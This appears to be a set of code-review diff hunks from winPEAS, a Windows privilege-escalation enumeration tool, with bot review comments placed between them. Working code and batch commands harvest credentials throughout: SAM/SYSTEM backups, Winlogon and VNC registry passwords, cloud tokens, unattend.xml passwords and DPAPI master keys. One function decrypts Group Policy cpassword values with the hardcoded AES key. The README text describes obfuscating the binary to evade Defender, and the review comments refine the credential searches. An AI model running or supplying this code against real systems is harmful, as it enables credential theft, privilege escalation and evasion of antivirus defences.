IF EXIST %WINDIR%\System32\config\RegBack\SAM ECHO %WINDIR%\System32\config\RegBack\SAM exists.
IF EXIST %WINDIR%\System32\config\SAM ECHO %WINDIR%\System32\config\SAM exists.
IF EXIST %WINDIR%\repair\SYSTEM ECHO %WINDIR%\repair\SYSTEM exists.
IF EXIST %WINDIR%\System32\config\SYSTEM ECHO %WINDIR%\System32\config\SYSTEM exists.
IF EXIST %WINDIR%\System32\config\RegBack\SYSTEM ECHO %WINDIR%\System32\config\RegBack\SYSTEM exists.
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] McAffe SiteList.xml ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
cd %ProgramFiles% 2>nul
dir /s SiteList.xml
cd %ProgramFiles(x86)% 2>nul
dir /s SiteList.xml
cd "%windir%\..\Documents and Settings" 2>nul
dir /s SiteList.xml
cd %windir%\..\Users 2>nul
dir /s SiteList.xml
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] GPP Password ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
cd "%SystemDrive%\Microsoft\Group Policy\history"
dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml
cd "%windir%\..\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history"
dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Cloud Creds ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
cd "%SystemDrive%\Users"
dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json
cd "%windir%\..\Documents and Settings"
dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json
echo.
echo.
echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] AppCmd ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO %systemroot%\system32\inetsrv\appcmd.exe exists.
@ -383,7 +452,7 @@ reg query HKCU\Software\ORL\WinVNC3\Password 2>nul
echo Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password 2>nul
echo Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
reg query HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon 2>nul
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
echo Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s 2>nul
echo Looking inside HKCU\Software\TightVNC\Server
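Review bot: The WDigest check at L1337 queries `...\WDigest\UseLogonCredential` as if it were a key, but `UseLogonCredential` is a REG_DWORD value under the `WDigest` key, so `reg query` reports "unable to find the specified registry key" on every host; it should be `reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential`, the same `/v` form used for `RunAsPPL` and `LsaCfgFlags` just above. The `[i]` hint would also be more useful if it said what an absent value means — as far as I recall, on Windows 8.1/2012 R2 and later a missing value means WDigest caching is off, while on older hosts (even with KB2871997 applied) a missing value means it is still on; worth confirming before wording it. Separately, the `cd X 2>nul` / `dir /s ...` pairs at L1386–L1393, L1397–L1400 and L1404–L1407 keep going when the `cd` fails, so the `dir` silently searches whatever the previous working directory was; chain them as `cd /d "..." 2>nul && dir /s/b ...` so a missing directory yields nothing instead of misleading hits. The first GPP path at L1397 (`%SystemDrive%\Microsoft\Group Policy\history`) looks like it was meant to be `%ProgramData%\Microsoft\Group Policy\History`, the Vista+ counterpart of the `All Users\Application Data` path on the following line.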


@ -12,10 +12,9 @@ Check also the **Local Windows Privilege Escalation checklist** from **[book.hac
Download the **[latest obfuscated version from here](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/bin/Obfuscated%20Releases)** or **compile it yourself** (read instructions for compilation).
```bash
winpeas.exe cmd searchfast #cmd commands and avoid sleepig (noisy - CTFs)
winpeas.exe cmd searchall searchfast #cmd commands, search all filenames and avoid sleepig (noisy - CTFs)
winpeas.exe #Will execute all checks except the ones that use a CMD
winpeas.exe cmd #All checks
winpeas.exe cmd fast #All except the one that search for files
winpeas.exe systeminfo userinfo #Only systeminfo and userinfo checks executed
winpeas.exe notcolor #Do not color the output
```
@ -24,11 +23,11 @@ winpeas.exe notcolor #Do not color the output
The goal of this project is to search for possible **Privilege Escalation Paths** in Windows environments.
It should take only a **few seconds** to execute almost all the checks and **some minutes during the last check searching in the whole main drive** for known files that could contain passwords (the time depened on the number of files in your drive). Get rid of that time consuming check using the parameter `fast`.
It should take only a **few seconds** to execute almost all the checks and **some seconds/minutes during the lasts checks searching for known filenames** that could contain passwords (the time depened on the number of files in your home folder). By default only **some** filenames that could contain credentials are searched, you can use the **searchall** parameter to search all the list (this could will add some minutes).
By default, the progam **sleeps 150ms** before start searching files in each directory. This is made to consume less resources (**stealthier**). You can **avoid this sleep using `searchfast` parameter**.
By default, the progam **sleeps 100ms** before start searching files in each directory. This is made to consume less resources (**stealthier**). You can **avoid this sleep using `searchfast` parameter**.
The **ouput will be colored** using **ansi** colors. If you are executing `winpeas.exe` **from a Windows console**, you need to set a registry value to see the colors:
The **ouput will be colored** using **ansi** colors. If you are executing `winpeas.exe` **from a Windows console**, you need to set a registry value to see the colors (and open a new CMD):
```
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
```
@ -52,7 +51,7 @@ Once you have installed and activated it you need to:
4. Click on **Build**
5. The **single, minimized and obfuscated binary** will appear in a **folder called Dotfuscator inside the folder were winPEAS.exe** and the DLL were (this location will be saved by dotfuscator and by default all the following builds will appear in this folder).
**I'm sorry that all of this is necessary but is worth it. Dotfuscator will merge the DLL and EXE in a single executable, will minimize the size of the executable (winpeas size was reduced to the half) and will obfuscate the code** (F\*\*k you Defender).
**I'm sorry that all of this is necessary but is worth it. Dotfuscator minimizes the size of the executable and obfuscates the code** (F\*\*k you Defender).
![](https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASexe/images/dotfuscator.PNG)
@ -73,6 +72,10 @@ Once you have installed and activated it you need to:
- [x] Basic System info information
- [x] Use Watson to search for vulnerabilities
- [x] PS, Audit, WEF and LAPS Settings
- [x] LSA protection?
- [x] Credential Guard?
- [x] WDigest?
- [x] Number of cached cred
- [x] Environment Variables
- [x] Internet Settings
- [x] Current drives information
@ -141,6 +144,10 @@ Once you have installed and activated it you need to:
- [x] Putty SSH host keys
- [x] SSH Keys inside registry
- [x] Cloud credentials
- [x] Check for unattended files
- [x] Check for SAM & SYSTEM backups
- [x] Check for cached GPP Passwords
- [x] Check for McAffe SiteList.xml files
- [x] Possible registries with credentials
- [x] Possible credentials files in users homes
- [x] Possible password files inside the Recycle bin



@ -49,9 +49,9 @@ namespace winPEAS
return retList;
}
public static Dictionary<string, Dictionary<string, string>> GetInstalledAppsPermsPath(string fpath)
public static SortedDictionary<string, Dictionary<string, string>> GetInstalledAppsPermsPath(string fpath)
{
Dictionary<string, Dictionary<string, string>> results = new Dictionary<string, Dictionary<string, string>>();
SortedDictionary<string, Dictionary<string, string>> results = new SortedDictionary<string, Dictionary<string, string>>();
try
{
foreach (string f in Directory.GetFiles(fpath))
@ -62,7 +62,7 @@ namespace winPEAS
}
foreach (string d in Directory.GetDirectories(fpath))
{
results[d] = MyUtils.GecRecursivePrivs(d);
results[d] = MyUtils.GetRecursivePrivs(d);
}
}
catch (Exception ex)
@ -72,12 +72,77 @@ namespace winPEAS
return results;
}
public static Dictionary<string, Dictionary<string, string>> GetInstalledAppsPerms()
public static SortedDictionary<string, Dictionary<string, string>> GetInstalledAppsPerms()
{
Dictionary<string, Dictionary<string, string>> results1 = GetInstalledAppsPermsPath(@Path.GetPathRoot(Environment.SystemDirectory) + "Program Files");
Dictionary<string, Dictionary<string, string>> results2 = GetInstalledAppsPermsPath(@Path.GetPathRoot(Environment.SystemDirectory) + "Program Files (x86)");
results1.Concat(results2).ToDictionary(kvp => kvp.Key, kvp => kvp.Value);
return results1;
//Get from Program Files
SortedDictionary<string, Dictionary<string, string>> results = GetInstalledAppsPermsPath(@Path.GetPathRoot(Environment.SystemDirectory) + "Program Files");
SortedDictionary<string, Dictionary<string, string>> results2 = GetInstalledAppsPermsPath(@Path.GetPathRoot(Environment.SystemDirectory) + "Program Files (x86)");
results.Concat(results2).ToDictionary(kvp => kvp.Key, kvp => kvp.Value);
//Get from Uninstall
string[] subkeys = MyUtils.GetRegSubkeys("HKLM", @"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall");
if (subkeys != null)
{
foreach (string app in subkeys)
{
string installLocation = MyUtils.GetRegValue("HKLM", String.Format(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0}", app), "InstallLocation");
if (String.IsNullOrEmpty(installLocation))
continue;
installLocation = installLocation.Replace("\"", "");
if (installLocation.EndsWith(@"\"))
installLocation = installLocation.Substring(0, installLocation.Length - 1);
if (!results.ContainsKey(installLocation) && Directory.Exists(installLocation))
{
bool already = false;
foreach (string path in results.Keys)
{
if (installLocation.IndexOf(path) != -1) //Check for subfoldres of already found folders
{
already = true;
break;
}
}
if (!already)
results[installLocation] = MyUtils.GetRecursivePrivs(installLocation);
}
}
}
subkeys = MyUtils.GetRegSubkeys("HKLM", @"SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall");
if (subkeys != null)
{
foreach (string app in subkeys)
{
string installLocation = MyUtils.GetRegValue("HKLM", String.Format(@"SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{0}", app), "InstallLocation");
if (String.IsNullOrEmpty(installLocation))
continue;
installLocation = installLocation.Replace("\"", "");
if (installLocation.EndsWith(@"\"))
installLocation = installLocation.Substring(0, installLocation.Length - 1);
if (!results.ContainsKey(installLocation) && Directory.Exists(installLocation))
{
bool already = false;
foreach (string path in results.Keys)
{
if (installLocation.IndexOf(path) != -1) //Check for subfoldres of already found folders
{
already = true;
break;
}
}
if (!already)
results[installLocation] = MyUtils.GetRecursivePrivs(installLocation);
}
}
}
return results;
}
public static List<Dictionary<string, string>> GetAutoRunsFolder()
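Review bot: `results.Concat(results2).ToDictionary(...)` at L1521 is an expression whose value is discarded, so nothing from `Program Files (x86)` ever reaches `results` — the same no-op the removed L1516 had, carried over into the new code. Replace it with a real merge: `foreach (var kv in results2) results[kv.Key] = kv.Value;`. The two Uninstall loops (L1523–L1549 and L1550–L1576) differ only in the key path and would read better as one private helper taking that path; inside them, `installLocation.IndexOf(path) != -1` is a case-sensitive substring test, so it misses `c:\program files\...` spelled in another case and would also treat an unrelated location that merely contains another path's text as a duplicate — `installLocation.StartsWith(path + @"\", StringComparison.OrdinalIgnoreCase)` expresses what is actually meant.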


@ -100,7 +100,7 @@ namespace winPEAS
System.Console.WriteLine(YELLOW + " [*] " + GREEN + "WinPEAS is a binary to enumerate possible paths to escalate privileges locally" + NOCOLOR);
System.Console.WriteLine(LBLUE + " quiet" + GRAY + " Do not print banner" + NOCOLOR);
System.Console.WriteLine(LBLUE + " searchfast" + GRAY + " Avoid sleeping while searching files (notable amount of resources)" + NOCOLOR);
System.Console.WriteLine(LBLUE + " fast" + GRAY + " Avoid very time consuming checks" + NOCOLOR);
System.Console.WriteLine(LBLUE + " searchall" + GRAY + " Search all known filenames whith possible credentials (coul take some mins)" + NOCOLOR);
System.Console.WriteLine(LBLUE + " cmd" + GRAY + " Obtain wifi, cred manager and clipboard information executing CMD commands" + NOCOLOR);
System.Console.WriteLine(LBLUE + " notansi" + GRAY + " Don't use ansi colors (all white)" + NOCOLOR);
System.Console.WriteLine(LBLUE + " systeminfo" + GRAY + " Search system information" + NOCOLOR);
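Review bot: The new `searchall` help line at L1588 has two typos in user-facing text, `whith` and `coul`; it should read `"Search all known filenames with possible credentials (could take some mins)"`. Since this line is what users see when they look for the option, it is worth fixing before the obfuscated release is built.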


@ -1,19 +1,406 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text.RegularExpressions;
using System.Xml;
namespace winPEAS
{
class InterestingFiles
{
public static List<string> GetUnattendedInstallFiles()
{ //From SharpUP
List<string> results = new List<string>();
try
{
string windir = System.Environment.GetEnvironmentVariable("windir");
string[] SearchLocations =
{
String.Format("{0}\\sysprep\\sysprep.xml", windir),
String.Format("{0}\\sysprep\\sysprep.inf", windir),
String.Format("{0}\\sysprep.inf", windir),
String.Format("{0}\\Panther\\Unattended.xml", windir),
String.Format("{0}\\Panther\\Unattend.xml", windir),
String.Format("{0}\\Panther\\Unattend\\Unattend.xml", windir),
String.Format("{0}\\Panther\\Unattend\\Unattended.xml", windir),
String.Format("{0}\\System32\\Sysprep\\unattend.xml", windir),
String.Format("{0}\\System32\\Sysprep\\Panther\\unattend.xml", windir),
String.Format("{0}\\..\\unattend.xml", windir),
String.Format("{0}\\..\\unattend.inf", windir),
};
foreach (string SearchLocation in SearchLocations)
{
if (System.IO.File.Exists(SearchLocation))
results.Add(SearchLocation);
}
}
catch (Exception ex)
{
Beaprint.GrayPrint(String.Format(" [X] Exception: {0}", ex.Message));
}
return results;
}
public static List<string> ExtractUnattenededPwd(string path)
{
List<string> results = new List<string>();
try {
string text = File.ReadAllText(path);
text = text.Replace("\n", "");
text = text.Replace("\r", "");
Regex regex = new Regex(@"<Password>.*</Password>");
foreach (Match match in regex.Matches(text))
results.Add(match.Value);
}
catch (Exception ex)
{
Beaprint.GrayPrint(String.Format(" [X] Exception: {0}", ex.Message));
}
return results;
}
public static List<string> GetSAMBackups()
{ //From SharpUP
List<string> results = new List<string>();
try
{
string systemRoot = System.Environment.GetEnvironmentVariable("SystemRoot");
string[] SearchLocations =
{
String.Format(@"{0}\repair\SAM", systemRoot),
String.Format(@"{0}\System32\config\RegBack\SAM", systemRoot),
//String.Format(@"{0}\System32\config\SAM", systemRoot),
String.Format(@"{0}\repair\SYSTEM", systemRoot),
//String.Format(@"{0}\System32\config\SYSTEM", systemRoot),
String.Format(@"{0}\System32\config\RegBack\SYSTEM", systemRoot),
};
foreach (string SearchLocation in SearchLocations)
{
if (System.IO.File.Exists(SearchLocation))
results.Add(SearchLocation);
}
}
catch (Exception ex)
{
Beaprint.GrayPrint(String.Format(" [X] Exception: {0}", ex.Message));
}
return results;
}
public static List<string> GetMcAfeeSitelistFiles()
{ //From SharpUP
List<string> results = new List<string>();
try
{
string drive = System.Environment.GetEnvironmentVariable("SystemDrive");
string[] SearchLocations =
{
String.Format("{0}\\Program Files\\", drive),
String.Format("{0}\\Program Files (x86)\\", drive),
String.Format("{0}\\Documents and Settings\\", drive),
String.Format("{0}\\Users\\", drive)
};
foreach (string SearchLocation in SearchLocations)
{
List<string> files = MyUtils.FindFiles(SearchLocation, "SiteList.xml");
foreach (string file in files)
results.Add(file);
}
}
catch (Exception ex)
{
Console.WriteLine(String.Format(" [X] Exception: {0}", ex.Message));
}
return results;
}
public static Dictionary<string, Dictionary<string, string>> GetCachedGPPPassword()
{ //From SharpUP
Dictionary<string, Dictionary<string, string>> results = new Dictionary<string, Dictionary<string, string>>();
try
{
string allUsers = System.Environment.GetEnvironmentVariable("ALLUSERSPROFILE");
if (!allUsers.Contains("ProgramData"))
{
// Before Windows Vista, the default value of AllUsersProfile was "C:\Documents and Settings\All Users"
// And after, "C:\ProgramData"
allUsers += "\\Application Data";
}
allUsers += "\\Microsoft\\Group Policy\\History"; // look only in the GPO cache folder
List<String> files = MyUtils.FindFiles(allUsers, "*.xml");
// files will contain all XML files
foreach (string file in files)
{
if (!(file.Contains("Groups.xml") || file.Contains("Services.xml")
|| file.Contains("Scheduledtasks.xml") || file.Contains("DataSources.xml")
|| file.Contains("Printers.xml") || file.Contains("Drives.xml")))
{
continue; // uninteresting XML files, move to next
}
XmlDocument xmlDoc = new XmlDocument();
xmlDoc.Load(file);
if (!xmlDoc.InnerXml.Contains("cpassword"))
{
continue; // no "cpassword" => no interesting content, move to next
}
Console.WriteLine("\r\n{0}", file);
string cPassword = "";
string UserName = "";
string NewName = "";
string Changed = "";
if (file.Contains("Groups.xml"))
{
XmlNode a = xmlDoc.SelectSingleNode("/Groups/User/Properties");
XmlNode b = xmlDoc.SelectSingleNode("/Groups/User");
foreach (XmlAttribute attr in a.Attributes)
{
if (attr.Name.Equals("cpassword"))
{
cPassword = attr.Value;
}
if (attr.Name.Equals("userName"))
{
UserName = attr.Value;
}
if (attr.Name.Equals("newName"))
{
NewName = attr.Value;
}
}
foreach (XmlAttribute attr in b.Attributes)
{
if (attr.Name.Equals("changed"))
{
Changed = attr.Value;
}
}
//Console.WriteLine("\r\nA{0}", a.Attributes[0].Value);
}
else if (file.Contains("Services.xml"))
{
XmlNode a = xmlDoc.SelectSingleNode("/NTServices/NTService/Properties");
XmlNode b = xmlDoc.SelectSingleNode("/NTServices/NTService");
foreach (XmlAttribute attr in a.Attributes)
{
if (attr.Name.Equals("cpassword"))
{
cPassword = attr.Value;
}
if (attr.Name.Equals("accountName"))
{
UserName = attr.Value;
}
}
foreach (XmlAttribute attr in b.Attributes)
{
if (attr.Name.Equals("changed"))
{
Changed = attr.Value;
}
}
}
else if (file.Contains("Scheduledtasks.xml"))
{
XmlNode a = xmlDoc.SelectSingleNode("/ScheduledTasks/Task/Properties");
XmlNode b = xmlDoc.SelectSingleNode("/ScheduledTasks/Task");
foreach (XmlAttribute attr in a.Attributes)
{
if (attr.Name.Equals("cpassword"))
{
cPassword = attr.Value;
}
if (attr.Name.Equals("runAs"))
{
UserName = attr.Value;
}
}
foreach (XmlAttribute attr in b.Attributes)
{
if (attr.Name.Equals("changed"))
{
Changed = attr.Value;
}
}
}
else if (file.Contains("DataSources.xml"))
{
XmlNode a = xmlDoc.SelectSingleNode("/DataSources/DataSource/Properties");
XmlNode b = xmlDoc.SelectSingleNode("/DataSources/DataSource");
foreach (XmlAttribute attr in a.Attributes)
{
if (attr.Name.Equals("cpassword"))
{
cPassword = attr.Value;
}
if (attr.Name.Equals("username"))
{
UserName = attr.Value;
}
}
foreach (XmlAttribute attr in b.Attributes)
{
if (attr.Name.Equals("changed"))
{
Changed = attr.Value;
}
}
}
else if (file.Contains("Printers.xml"))
{
XmlNode a = xmlDoc.SelectSingleNode("/Printers/SharedPrinter/Properties");
XmlNode b = xmlDoc.SelectSingleNode("/Printers/SharedPrinter");
foreach (XmlAttribute attr in a.Attributes)
{
if (attr.Name.Equals("cpassword"))
{
cPassword = attr.Value;
}
if (attr.Name.Equals("username"))
{
UserName = attr.Value;
}
}
foreach (XmlAttribute attr in b.Attributes)
{
if (attr.Name.Equals("changed"))
{
Changed = attr.Value;
}
}
}
else
{
// Drives.xml
XmlNode a = xmlDoc.SelectSingleNode("/Drives/Drive/Properties");
XmlNode b = xmlDoc.SelectSingleNode("/Drives/Drive");
foreach (XmlAttribute attr in a.Attributes)
{
if (attr.Name.Equals("cpassword"))
{
cPassword = attr.Value;
}
if (attr.Name.Equals("username"))
{
UserName = attr.Value;
}
}
foreach (XmlAttribute attr in b.Attributes)
{
if (attr.Name.Equals("changed"))
{
Changed = attr.Value;
}
}
}
if (UserName.Equals(""))
{
UserName = "[BLANK]";
}
if (NewName.Equals(""))
{
NewName = "[BLANK]";
}
if (cPassword.Equals(""))
{
cPassword = "[BLANK]";
}
else
{
cPassword = DecryptGPP(cPassword);
}
if (Changed.Equals(""))
{
Changed = "[BLANK]";
}
results[file] = new Dictionary<string, string>();
results[file]["UserName"] = UserName;
results[file]["NewName"] = NewName;
results[file]["cPassword"] = cPassword;
results[file]["Changed"] = Changed;
}
}
catch (Exception ex)
{
Console.WriteLine(String.Format(" [X] Exception: {0}", ex.Message));
}
return results;
}
public static string DecryptGPP(string cpassword)
{ //From SharpUP
int mod = cpassword.Length % 4;
switch (mod)
{
case 1:
cpassword = cpassword.Substring(0, cpassword.Length - 1);
break;
case 2:
cpassword += "".PadLeft(4 - mod, '=');
break;
case 3:
cpassword += "".PadLeft(4 - mod, '=');
break;
default:
break;
}
byte[] base64decoded = Convert.FromBase64String(cpassword);
AesCryptoServiceProvider aesObject = new AesCryptoServiceProvider();
byte[] aesKey = { 0x4e, 0x99, 0x06, 0xe8, 0xfc, 0xb6, 0x6c, 0xc9, 0xfa, 0xf4, 0x93, 0x10, 0x62, 0x0f, 0xfe, 0xe8, 0xf4, 0x96, 0xe8, 0x06, 0xcc, 0x05, 0x79, 0x90, 0x20, 0x9b, 0x09, 0xa4, 0x33, 0xb6, 0x6c, 0x1b };
byte[] aesIV = new byte[aesObject.IV.Length];
aesObject.IV = aesIV;
aesObject.Key = aesKey;
ICryptoTransform aesDecryptor = aesObject.CreateDecryptor();
byte[] outBlock = aesDecryptor.TransformFinalBlock(base64decoded, 0, base64decoded.Length);
return System.Text.UnicodeEncoding.Unicode.GetString(outBlock);
}
public static List<string> ListUsersDocs()
{
List<string> results = new List<string>();
try
{
// returns files (w/ modification dates) that match the given pattern below
string patterns = "*diagram*;*.pdf;*.vsd;*.doc;*docx;*.xls;*.xlsx;";
string patterns = "*diagram*;*.pdf;*.vsd;*.doc;*docx;*.xls;*.xlsx";
if (MyUtils.IsHighIntegrity())
{
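Review bot: ExtractUnattenededPwd's pattern `<Password>.*</Password>` at L1647 is greedy, and because the file has just been flattened to a single line (L1645–L1646) it matches from the first `<Password>` to the last `</Password>`, collapsing every password element and everything between them into one match; use `Regex regex = new Regex(@"<Password>.*?</Password>");` (or `[^<]*`) so each element is reported on its own. In GetCachedGPPPassword the `SelectSingleNode` results at L1746–L1747 and in the sibling branches are dereferenced without a null check, so one cached XML with a different layout throws NullReferenceException into the outer catch and silently drops every remaining file; check for null and `continue` per file, and set `xmlDoc.XmlResolver = null;` before `Load` (L1734) so a DTD in a cached policy file is never resolved. DecryptGPP's `AesCryptoServiceProvider` and `ICryptoTransform` (L1939, L1944) are IDisposable and are never disposed, and a malformed cpassword makes `Convert.FromBase64String` (L1938) throw out of the same per-file loop rather than skipping that entry. Output is inconsistent: L1706, L1739 and L1917 use `Console.WriteLine` where the sibling methods report through `Beaprint.GrayPrint`. ListUsersDocs (L1948) continues past the end of this section, with L1954–L1955 an old/new pair.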


@ -843,7 +843,7 @@ namespace winPEAS
string[] subkeys = MyUtils.GetRegSubkeys("HKU", String.Format("{0}\\Software\\Microsoft\\Terminal Server Client\\Servers", SID));
if (subkeys != null)
{
Console.WriteLine("\r\n\r\n=== Saved RDP Connection Information ({0}) ===", SID);
//Console.WriteLine("\r\n\r\n=== Saved RDP Connection Information ({0}) ===", SID);
foreach (string host in subkeys)
{
string usernameHint = MyUtils.GetRegValue("HKCU", String.Format("Software\\Microsoft\\Terminal Server Client\\Servers\\{0}", host), "UsernameHint");
@ -1351,27 +1351,33 @@ namespace winPEAS
string userName = parts[parts.Length - 1];
if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
{
string userDPAPIBasePath = String.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", dir);
if (System.IO.Directory.Exists(userDPAPIBasePath))
{
string[] directories = Directory.GetDirectories(userDPAPIBasePath);
foreach (string directory in directories)
{
string[] files = Directory.GetFiles(directory);
List<string> userDPAPIBasePaths = new List<string>();
userDPAPIBasePaths.Add(String.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
userDPAPIBasePaths.Add(String.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
foreach (string file in files)
foreach (string userDPAPIBasePath in userDPAPIBasePaths)
{
if (System.IO.Directory.Exists(userDPAPIBasePath))
{
string[] directories = Directory.GetDirectories(userDPAPIBasePath);
foreach (string directory in directories)
{
if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
string[] files = Directory.GetFiles(directory);
foreach (string file in files)
{
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
string fileName = System.IO.Path.GetFileName(file);
results.Add(new Dictionary<string, string>()
if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
{
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
string fileName = System.IO.Path.GetFileName(file);
results.Add(new Dictionary<string, string>()
{
{ "MasterKey", file },
{ "Accessed", String.Format("{0}", lastAccessed) },
{ "Modified", String.Format("{0}", lastModified) },
});
}
}
}
}
@ -1382,28 +1388,33 @@ namespace winPEAS
else
{
string userName = Environment.GetEnvironmentVariable("USERNAME");
string userDPAPIBasePath = String.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE"));
List<string> userDPAPIBasePaths = new List<string>();
userDPAPIBasePaths.Add(String.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
userDPAPIBasePaths.Add(String.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
if (System.IO.Directory.Exists(userDPAPIBasePath))
foreach (string userDPAPIBasePath in userDPAPIBasePaths)
{
string[] directories = Directory.GetDirectories(userDPAPIBasePath);
foreach (string directory in directories)
if (System.IO.Directory.Exists(userDPAPIBasePath))
{
string[] files = Directory.GetFiles(directory);
foreach (string file in files)
string[] directories = Directory.GetDirectories(userDPAPIBasePath);
foreach (string directory in directories)
{
if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
string[] files = Directory.GetFiles(directory);
foreach (string file in files)
{
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
string fileName = System.IO.Path.GetFileName(file);
results.Add(new Dictionary<string, string>()
if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
{
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
string fileName = System.IO.Path.GetFileName(file);
results.Add(new Dictionary<string, string>()
{
{ "MasterKey", file },
{ "Accessed", String.Format("{0}", lastAccessed) },
{ "Modified", String.Format("{0}", lastModified) },
});
}
}
}
}
@ -1435,35 +1446,40 @@ namespace winPEAS
string userName = parts[parts.Length - 1];
if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
{
string userCredFilePath = String.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", dir);
if (System.IO.Directory.Exists(userCredFilePath))
List<string> userCredFilePaths = new List<string>();
userCredFilePaths.Add(String.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", dir));
userCredFilePaths.Add(String.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", dir));
foreach (string userCredFilePath in userCredFilePaths)
{
string[] systemFiles = Directory.GetFiles(userCredFilePath);
if ((systemFiles != null) && (systemFiles.Length != 0))
if (System.IO.Directory.Exists(userCredFilePath))
{
foreach (string file in systemFiles)
string[] systemFiles = Directory.GetFiles(userCredFilePath);
if ((systemFiles != null) && (systemFiles.Length != 0))
{
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
long size = new System.IO.FileInfo(file).Length;
string fileName = System.IO.Path.GetFileName(file);
foreach (string file in systemFiles)
{
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
long size = new System.IO.FileInfo(file).Length;
string fileName = System.IO.Path.GetFileName(file);
// jankily parse the bytes to extract the credential type and master key GUID
// reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
byte[] credentialArray = File.ReadAllBytes(file);
byte[] guidMasterKeyArray = new byte[16];
Array.Copy(credentialArray, 36, guidMasterKeyArray, 0, 16);
Guid guidMasterKey = new Guid(guidMasterKeyArray);
// jankily parse the bytes to extract the credential type and master key GUID
// reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
byte[] credentialArray = File.ReadAllBytes(file);
byte[] guidMasterKeyArray = new byte[16];
Array.Copy(credentialArray, 36, guidMasterKeyArray, 0, 16);
Guid guidMasterKey = new Guid(guidMasterKeyArray);
byte[] stringLenArray = new byte[16];
